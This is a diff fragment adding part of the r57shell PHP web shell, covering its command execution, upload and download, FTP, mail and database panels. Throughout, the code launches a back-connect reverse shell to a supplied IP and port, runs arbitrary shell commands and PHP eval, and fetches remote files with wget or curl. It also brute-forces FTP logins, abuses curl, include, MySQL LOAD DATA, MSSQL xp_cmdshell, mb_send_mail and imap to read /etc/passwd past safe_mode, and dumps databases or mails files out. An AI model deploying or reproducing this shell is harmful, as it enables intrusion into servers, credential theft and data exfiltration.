+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); }
+ else 
+  {   	
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {	
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }	
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }	
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");	
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);	
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);	
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;	
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {	
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);	
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];	
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; 	
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';	
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
